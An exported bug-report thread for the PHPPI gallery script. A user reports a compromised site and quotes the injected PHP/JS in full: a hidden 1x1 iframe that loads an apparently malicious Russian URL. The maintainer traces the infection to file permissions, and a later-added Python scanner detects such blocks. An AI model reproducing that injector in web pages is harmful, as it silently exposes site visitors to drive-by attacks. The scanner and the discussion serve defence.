akirafreak / phppi

Automatically exported from code.google.com/p/phppi
GNU General Public License v3.0

virus in files??? #25

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
What steps will reproduce the problem?
1. Install a fresh PHPPI (1.1.1 or 1.2.0)
2. Wait a few days
3. Some PHP and/or JS files are modified by a virus

What is the expected output? What do you see instead?
My NOD32 antivirus reports the JS/Iframe.GJ trojan

What version of PHPPI are you using? On what operating system?
1.1.1 or 1.2.0

Please provide any additional information below.
The following code was added to a PHP file:

<?
#04b037#
echo "
<script type=\"text/javascript\" language=\"javascript\" >
(function () {
    var ykp = document.createElement('iframe');
    ykp.src = 'http://fawsilom.ru/count8.php';
    ykp.style.position = 'absolute';
    ykp.style.border = '0';
    ykp.style.height = '1px';
    ykp.style.width = '1px';
    ykp.style.left = '1px';
    ykp.style.top = '1px';
    if (!document.getElementById('ykp')) {
        document.write('<div id=\'ykp\'></div>');
        document.getElementById('ykp').appendChild(ykp);
    }
})();
</script>";

#/04b037#
?>

Only this script is modified on my site:
www.fordcapri.hu/phpalbum

Sorry for my poor English.

Original issue reported on code.google.com by eekl...@gmail.com on 6 Jan 2013 at 9:38

GoogleCodeExporter commented 9 years ago
I could not find that code in any files from PHPPI. I would have to say that 
you're being hacked. Check your permissions for files and/or folders. If you 
have them set to allow read and write from everyone then your files can be 
edited/hacked.

As an example, you can see that this particular hack is quite common: if you 
search Google for http://fawsilom.ru/count8.php you will find many results with 
websites that have been hacked (I would advise against visiting any of those 
sites).

Just out of curiosity, which PHP file is edited when you do get hacked?

Original comment by gorounreal on 7 Jan 2013 at 10:15

GoogleCodeExporter commented 9 years ago
Infected files:

index.php
phppi_js.js
jquery.js
jquery.fancybox.js
admin/index.php

If I set the permissions to 444, no files are modified. If the file 
permissions are 644, some files are modified. My Joomla files are not, only the 
PHPPI files. Only the cache dir is 777. I will contact my server admin. Thank 
you for your help.

Original comment by eekl...@gmail.com on 7 Jan 2013 at 2:36

GoogleCodeExporter commented 9 years ago
Due to this issue more than likely being caused by the host's security measures, 
and there being no viruses/malicious code in the original source, I'm closing 
this ticket. If there are further reports from other users I will look into the 
issue.

Original comment by gorounreal on 18 Jan 2013 at 10:38
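
A defender-side check for the two things discussed in this thread, as an added example that is not part of the original issue or of PHPPI: it finds marker-delimited blocks of the form shown in the report ("#04b037#" ... "#/04b037#") and lists world-writable entries such as the 777 cache directory. Assumptions: other infections use the same marker shape with a different six-hex-digit id; the function names, the extension list and the constructed sample tree (with a placeholder URL) are hypothetical.

```python
import os
import re
import stat
import tempfile

# Marker pair as shown in the report: "#04b037#" ... "#/04b037#".
# Assumption: other infections use the same shape with a different 6-hex id.
MARKER_BLOCK = re.compile(r"#([0-9a-f]{6})#(.*?)#/\1#", re.DOTALL | re.IGNORECASE)
SCAN_EXT = (".php", ".js", ".htm", ".html")

def find_injections(text):
    """Return (marker_id, mentions_iframe) for each marker-delimited block."""
    return [(m.group(1).lower(), "iframe" in m.group(2).lower())
            for m in MARKER_BLOCK.finditer(text)]

def scan_tree(root):
    """Report injected blocks and world-writable entries below root."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in sorted(dirnames + filenames):
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            if stat.S_ISLNK(mode):
                continue  # do not follow or judge symlinks
            rel = os.path.relpath(path, root)
            if mode & stat.S_IWOTH:
                findings.append((rel, "world-writable", oct(stat.S_IMODE(mode))))
            if stat.S_ISREG(mode) and name.lower().endswith(SCAN_EXT):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for marker, _iframe in find_injections(fh.read()):
                        findings.append((rel, "injected-block", marker))
    return findings

def demo():
    """Build a constructed sample tree (not real site data) and scan it."""
    infected = ('<?\n#04b037#\necho "<script>var f = '
                "document.createElement('iframe'); "
                "f.src = 'http://placeholder.invalid/';</script>\";\n"
                '#/04b037#\n?>\n<?php echo "gallery"; ?>\n')
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "cache"))
        os.chmod(os.path.join(root, "cache"), 0o777)
        for name, body in (("index.php", infected), ("clean.php", "<?php ?>\n")):
            path = os.path.join(root, name)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
            os.chmod(path, 0o644)
        return scan_tree(root)

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

A hit on "injected-block" means the file should be restored from a known-good copy of the release; the pattern matches only the PHP-comment marker form shown in the report, so injected .js files may carry a different wrapper that this check does not cover.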